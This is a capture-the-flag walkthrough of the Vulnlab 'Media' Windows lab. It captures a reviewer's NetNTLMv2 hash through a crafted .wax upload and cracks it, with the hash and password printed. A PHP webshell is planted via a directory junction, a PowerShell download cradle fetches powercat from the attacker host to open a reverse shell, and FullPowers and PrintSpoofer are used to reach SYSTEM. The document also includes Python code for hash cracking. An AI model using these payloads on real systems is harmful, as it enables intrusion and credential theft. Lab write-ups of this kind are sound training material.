In this walkthrough we will be going through the Media room from Vulnlab. The room is rated Medium on the platform. It consists of abusing a file upload functionality by crafting a document that makes the reviewing user authenticate back to us, so we capture their NetNTLMv2 hash; cracking it gives us initial access to the target. For privilege escalation, we abuse a directory junction to get a webshell written into the web root, which gives us access as NT AUTHORITY\LOCAL SERVICE. Finally, FullPowers is used to recover the service account's default privileges and PrintSpoofer turns those into a shell as NT AUTHORITY\SYSTEM. So, let's get started without any delay.
Machine Info:

| Title | Media |
|---|---|
| IP address | 10.10.76.57 |
| Difficulty | Medium |
| OS | Windows |
| Description | Media is a Medium Windows machine that requires abusing a file upload functionality by crafting a document that captures the reviewing user's NetNTLMv2 hash; cracking it gives initial access to the target. For privilege escalation, a directory junction is abused to get a webshell written into the web root, giving access as NT AUTHORITY\LOCAL SERVICE. Finally, FullPowers is used together with PrintSpoofer to get NT AUTHORITY\SYSTEM. |
Enumeration:
- I started off with a regular nmap scan along with an all-TCP-port scan. Found 3 ports open: 22 (SSH), 80 (HTTP) and 3389 (RDP). The RDP NTLM info shows the NetBIOS domain and computer name are both MEDIA, so this is a standalone host rather than a domain member, and build 10.0.20348 is Windows Server 2022. OpenSSH on port 22 means any local credentials we find can be used for a shell directly.
$ sudo nmap -sV -sC 10.10.76.57
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:18 IST
Nmap scan report for 10.10.76.57
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 0b:b3:c0:80:40:88:e1:ae:aa:3b:5f:f4:c2:23:c0:0d (RSA)
|   256 e0:80:3f:dd:b1:f8:fc:83:f5:de:d5:b3:2d:5a:4b:39 (ECDSA)
|_  256 b5:32:c0:72:18:10:0f:24:5d:f8:e1:ce:2a:73:5c:1f (ED25519)
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: ProMotion Studio
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: MEDIA
|   NetBIOS_Domain_Name: MEDIA
|   NetBIOS_Computer_Name: MEDIA
|   DNS_Domain_Name: MEDIA
|   DNS_Computer_Name: MEDIA
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-22T11:49:20+00:00
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2024-04-21T11:45:58
|_Not valid after:  2024-10-21T11:45:58
|_ssl-date: 2024-04-22T11:49:26+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.55 seconds
$ sudo nmap -p- -T5 10.10.76.57
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:19 IST
Nmap scan report for 10.10.76.57
Host is up (0.20s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 292.96 seconds
PORT 80 (HTTP)
- The web server on port 80 hosts a static website for a design studio (page title "ProMotion Studio").
- The about section lists some potential employee names, which are worth noting as candidate usernames.
- There is a file upload form. According to its description it accepts a video file that HR will review, which means someone (or some automated process) on the target opens whatever we upload. We will abuse this twice: first to capture a hash, later to plant a webshell.
- Fired gobuster at the target to find hidden directories, in particular the one where uploads are stored so we could reach them over HTTP, but found nothing useful. Note that this run used asp/aspx extensions even though the server header says PHP; a php extension would have been the better choice here.
$ gobuster dir -u http://10.10.76.57/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.76.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
2024/04/22 17:35:26 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 332] [--> http://10.10.76.57/js/]
/css                  (Status: 301) [Size: 333] [--> http://10.10.76.57/css/]
/assets               (Status: 301) [Size: 336] [--> http://10.10.76.57/assets/]
/webalizer            (Status: 403) [Size: 420]
/phpmyadmin           (Status: 403) [Size: 420]
/examples             (Status: 503) [Size: 401]
/licenses             (Status: 403) [Size: 420]
/server-status        (Status: 403) [Size: 420]
/con                  (Status: 403) [Size: 301]
/con.asp              (Status: 403) [Size: 301]
/con.aspx             (Status: 403) [Size: 301]
/aux                  (Status: 403) [Size: 301]
/aux.aspx             (Status: 403) [Size: 301]
/aux.asp              (Status: 403) [Size: 301]
===============================================================
2024/04/22 17:53:10 Finished
===============================================================
Exploitation:
- We know the upload form expects a media file, so I generated one with the ntlm_theft script. The generated .wax file (a Windows Media Player playlist) references a UNC path on our host; when the reviewing user opens it, Windows tries to authenticate to our fake SMB server, and Responder records the NetNTLMv2 challenge/response. If all goes well and the user opens our media file, we get their hash.
python3 ntlm_theft.py -g wax -s 10.8.2.6 --filename media
- As suspected, Responder caught the hash of user "enox", which I then cracked with john.
sudo python3 Responder.py -I tun0
enox::MEDIA:66ce4d0cf1dfba48:A699AB188E409F8B8728A5468931D5FE:01010000000000008061F754DE94DA01F6CEC41CB6ADCA4600000000020008004800500038004E0001001E00570049004E002D004A004400510043004E0046005A00570039003100320004003400570049004E002D004A004400510043004E0046005A0057003900310032002E004800500038004E002E004C004F00430041004C00030014004800500038004E002E004C004F00430041004C00050014004800500038004E002E004C004F00430041004C00070008008061F754DE94DA0106000400020000000800300030000000000000000000000000300000F60DD5F3E407850FA06D5F0AAD3B5CBB61CA844B9BB06C0F4949449785EEBED50A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0038002E0032002E0036000000000000000000
sudo john --wordlist=/usr/share/wordlists/rockyou.txt enox.hash
enox: 1234virus@
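To make explicit what Responder captured above and what john verified for each candidate, here is an added example (my code, not the walkthrough's and not Responder's or john's): it parses a Responder-format NetNTLMv2 line, recomputes NTProofStr from a candidate password and compares. MD4 is implemented in pure Python because hashlib's md4 is often unavailable on OpenSSL 3 builds. The CAPTURED line is the one from this page; the second line (user alice, domain LAB, the challenge and blob bytes) is constructed purely for the self-check.

```python
"""Recompute a NetNTLMv2 response from a password candidate.

Added example for this walkthrough (not code from the page, Responder or john).
"""
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 needs the OpenSSL legacy provider)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password (this is the 'NTLM hash')."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over upper(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def parse_responder_line(line: str) -> dict:
    """Responder/john format: user::domain:server_challenge:NTProofStr:blob (hex fields)."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def verify_netntlmv2(line: str, password: str) -> bool:
    """NTProofStr must equal HMAC-MD5(NTOWFv2, server_challenge || blob)."""
    h = parse_responder_line(line)
    key = ntlmv2_hash(password, h["user"], h["domain"])
    expected = hmac.new(key, h["challenge"] + h["blob"], "md5").digest()
    return hmac.compare_digest(expected, h["proof"])


def make_responder_line(user, domain, password, challenge: bytes, blob: bytes) -> str:
    """Produce the line Responder would log for a known password (used for self-checks)."""
    proof = hmac.new(ntlmv2_hash(password, user, domain), challenge + blob, "md5").hexdigest()
    return f"{user}::{domain}:{challenge.hex()}:{proof.upper()}:{blob.hex()}"


def crack(line: str, candidates):
    """Dictionary attack: return the first candidate whose NTProofStr matches, else None."""
    for pw in candidates:
        if verify_netntlmv2(line, pw):
            return pw
    return None


# The line Responder logged in this walkthrough (copied from the page, split for width).
CAPTURED = (
    "enox::MEDIA:66ce4d0cf1dfba48:A699AB188E409F8B8728A5468931D5FE:"
    "01010000000000008061F754DE94DA01F6CEC41CB6ADCA4600000000"
    "020008004800500038004E0001001E00570049004E002D004A004400510043004E0046005A0057003900310032"
    "0004003400570049004E002D004A004400510043004E0046005A0057003900310032002E004800500038004E002E004C004F00430041004C00"
    "030014004800500038004E002E004C004F00430041004C00050014004800500038004E002E004C004F00430041004C00"
    "070008008061F754DE94DA0106000400020000000800300030000000000000000000000000300000"
    "F60DD5F3E407850FA06D5F0AAD3B5CBB61CA844B9BB06C0F4949449785EEBED5"
    "0A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0038002E0032002E0036000000000000000000"
)

if __name__ == "__main__":
    # A tiny wordlist standing in for rockyou.txt.
    print(crack(CAPTURED, ["123456", "password", "1234virus@"]))
```

Note that only the user name is upper-cased in NTOWFv2; the domain is used as the client sent it, which is why Responder's domain field must be kept verbatim when feeding hashes to a cracker.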
- Logged into the machine over SSH with enox's credentials and grabbed the local flag.
Privilege Escalation:
- Looking around the file system, I found the application's source directory (the XAMPP web root). The index.php file reveals how uploads are handled.
<?php
error_reporting(0);

// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
    $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
    $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
    $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

    // Create a folder name using the MD5 hash of Firstname + Lastname + Email
    $folderName = md5($firstname . $lastname . $email);

    // Create the full upload directory path
    $targetDir = $uploadDir . $folderName . '/';

    // Ensure the directory exists; create it if not
    if (!file_exists($targetDir)) {
        mkdir($targetDir, 0777, true);
    }

    // Sanitize the filename to remove unsafe characters
    $originalFilename = $_FILES["fileToUpload"]["name"];
    $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);

    // Build the full path to the target file
    $targetFile = $targetDir . $sanitizedFilename;

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
        echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

        // Update the todo.txt file
        $todoFile = $uploadDir . 'todo.txt';
        $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

        // Append the new line to the file
        file_put_contents($todoFile, $todoContent, FILE_APPEND);
    } else {
        echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
    }
}
?>
- We now know that uploads are stored under C:/Windows/Tasks/Uploads/ and that each upload goes into a folder named md5($firstname . $lastname . $email), derived purely from form fields we control. Three details matter for what follows. First, the directory is only created if it does not already exist, so a directory (or junction) we pre-create with the predicted name is used as-is. Second, the filename sanitiser only strips characters outside [a-zA-Z0-9._], so a .php extension survives. Third, FILTER_SANITIZE_STRING strips HTML tags and encodes quotes, so stick to plain alphanumerics and a normal email address when predicting the hash. The todo.txt that is appended after each upload records the original filename and folder name; presumably the simulated HR user works from this list, which is how our .wax file got opened.
// Create a folder name using the MD5 hash of Firstname + Lastname + Email
$folderName = md5($firstname . $lastname . $email);
- I created a shell.php file with the following web shell contents.
<?php echo system($_GET['c']); ?>
- Since we know how the upload folder is derived, we can predict its name before uploading: compute the MD5 of first name, last name and email concatenated with no separator, using exactly the values we will later type into the form.
echo -n "[email protected]" | md5sum
50246ad7e7c5f6c75808fe08f5dfcb6e
- We can abuse this with an NTFS directory junction. Junctions (mklink /J) need no special privilege, unlike symbolic links (mklink /D), which require SeCreateSymbolicLinkPrivilege. The Uploads directory is writable by our user (creating the directory below confirms it), so we create the predicted folder name, remove it again, and recreate it as a junction pointing at the application's web root, C:\xampp\htdocs. From index.php's point of view the directory now exists, so mkdir is skipped and move_uploaded_file writes through the junction; the write is done by the Apache process, not by enox, so our shell.php lands in htdocs and is executed by PHP when we request it.
# Creating and removing our predicted directory (run from inside C:\Windows\Tasks\Uploads)
mkdir 50246ad7e7c5f6c75808fe08f5dfcb6e
rmdir 50246ad7e7c5f6c75808fe08f5dfcb6e

# Creating the junction to the web root
mklink /J C:\Windows\Tasks\Uploads\50246ad7e7c5f6c75808fe08f5dfcb6e C:\xampp\htdocs\
- Uploading the shell.php webshell with our specified values for first name, lastname and email.
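To see the two properties the junction trick depends on (a predictable folder name and an extension-preserving sanitiser) and the check that would have stopped it, here is an added example in Python. It is my code, not the page's or the application's PHP; the PHP logic is mirrored so the folder name can be computed offline, and the hardened handler is what a reviewer would ask for. The names Jane, Doe and jane@example.test, the allowed-extension list and the temporary directories are constructed for the demo, and os.symlink stands in for mklink /J so it runs on any OS.

```python
"""Upload-path logic of the page's index.php, its abuse, and the missing check.

Added example, not code from the original page. Sample names and paths are constructed.
"""
import hashlib
import os
import re
import secrets
import tempfile

# Same base directory as $uploadDir in the page's index.php.
UPLOAD_ROOT = "C:/Windows/Tasks/Uploads/"

# Assumption for the hardened variant: HR only ever expects video files.
ALLOWED_EXT = {".mp4", ".mov", ".webm"}


def sanitize_filename(name: str) -> str:
    """Mirrors preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename).
    Slashes are removed, but dots and the extension survive: shell.php stays shell.php."""
    return re.sub(r"[^a-zA-Z0-9._]", "", name)


def predict_folder(first: str, last: str, email: str) -> str:
    """Mirrors md5($firstname . $lastname . $email). Anyone who knows the three
    form values knows the folder name before the upload happens."""
    return hashlib.md5((first + last + email).encode()).hexdigest()


def vulnerable_target(first, last, email, filename, root=UPLOAD_ROOT):
    """The path move_uploaded_file() writes to, built exactly as index.php does.
    If root/<folder> is a junction to the web root, this is really htdocs/<filename>."""
    return root + predict_folder(first, last, email) + "/" + sanitize_filename(filename)


def is_confined(path: str, root: str) -> bool:
    """Resolve junctions/symlinks on the directory part and require the result
    to stay under root. This is the check index.php lacks."""
    real_root = os.path.realpath(root)
    real_dir = os.path.realpath(os.path.dirname(path))
    return real_dir == real_root or real_dir.startswith(real_root + os.sep)


def hardened_target(filename: str, root: str) -> str:
    """Unpredictable per-upload folder, extension allowlist, containment check."""
    base = sanitize_filename(os.path.basename(filename))
    if os.path.splitext(base)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {base}")
    target = os.path.join(root, secrets.token_hex(16), base)
    if not is_confined(target, root):
        raise ValueError("upload directory escapes the upload root")
    return target


def accepts(filename: str) -> bool:
    """True if the hardened handler would store this file (uses a throwaway root)."""
    with tempfile.TemporaryDirectory() as root:
        try:
            hardened_target(filename, root)
            return True
        except ValueError:
            return False


def demo_junction_escape():
    """Rebuild the attack layout in a temp dir: root/<predicted> is a link to an
    'htdocs' directory outside root (os.symlink stands in for mklink /J).
    Returns (confined_for_honest_folder, confined_for_linked_folder)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "Uploads")
        htdocs = os.path.join(tmp, "htdocs")
        os.makedirs(root)
        os.makedirs(htdocs)
        folder = predict_folder("Jane", "Doe", "jane@example.test")
        os.symlink(htdocs, os.path.join(root, folder), target_is_directory=True)
        honest = os.path.join(root, "some_other_folder", "video.mp4")
        os.makedirs(os.path.dirname(honest))
        linked = vulnerable_target("Jane", "Doe", "jane@example.test", "shell.php", root + os.sep)
        return is_confined(honest, root), is_confined(linked, root)


if __name__ == "__main__":
    print(vulnerable_target("Jane", "Doe", "jane@example.test", "shell.php"))
    print(demo_junction_escape())  # (True, False)
```

Note that because the three fields are concatenated without a separator, ("Jane", "Doe") and ("JaneDoe", "") map to the same folder; the predictability, not the collision, is what the attack needs, but both come from the same design choice.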
- The webshell works (requested as /shell.php?c=whoami from the web root) and runs as NT AUTHORITY\LOCAL SERVICE, Apache's service account. Let's upgrade it to a proper reverse shell with powercat: serve powercat.ps1 over HTTP from our host on port 8000, start a listener on port 445, and pass the command below through the c parameter, URL-encoded.
Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.8.2.6:8000/powercat.ps1');powercat -c 10.8.2.6 -p 445 -e cmd
- We now have a shell as LOCAL SERVICE, but the token we landed in may have been stripped of SeImpersonatePrivilege, since service privileges can be restricted per service. FullPowers (by itm4n) recovers the account's default privilege set, including SeImpersonatePrivilege, by creating a scheduled task that runs as the same service account with the full set and spawning a new process from it. Confirm with whoami /priv in the new process before moving on.
Exploit – FullPowers: https://github.com/itm4n/FullPowers.git
Exploit – PrintSpoofer: https://github.com/itm4n/PrintSpoofer/releases
- With SeImpersonatePrivilege enabled we can use PrintSpoofer, which coerces the print spooler service into connecting to a named pipe we control and impersonates the resulting SYSTEM token. The -i flag gives an interactive session and -c specifies the command to run, so this drops us into a shell as NT AUTHORITY\SYSTEM.
PrintSpoofer.exe -i -c cmd
Conclusion:
So that was "Media" for you. We started off with an nmap scan and found 3 ports open: 22 (SSH), 80 (HTTP) and 3389 (RDP). Enumerating the web server on port 80 turned up a file upload form. We abused it by uploading a document generated with ntlm_theft that points at our SMB server, captured the reviewing user's NetNTLMv2 hash with Responder and cracked it, which gave us initial access over SSH. For privilege escalation we predicted the upload folder name, replaced it with a junction to the web root and uploaded a webshell, which gave us code execution as NT AUTHORITY\LOCAL SERVICE. Finally, FullPowers restored SeImpersonatePrivilege and PrintSpoofer turned it into a shell as NT AUTHORITY\SYSTEM. On that note, I would take your leave and will meet you in the next one. Till then, "Happy hacking".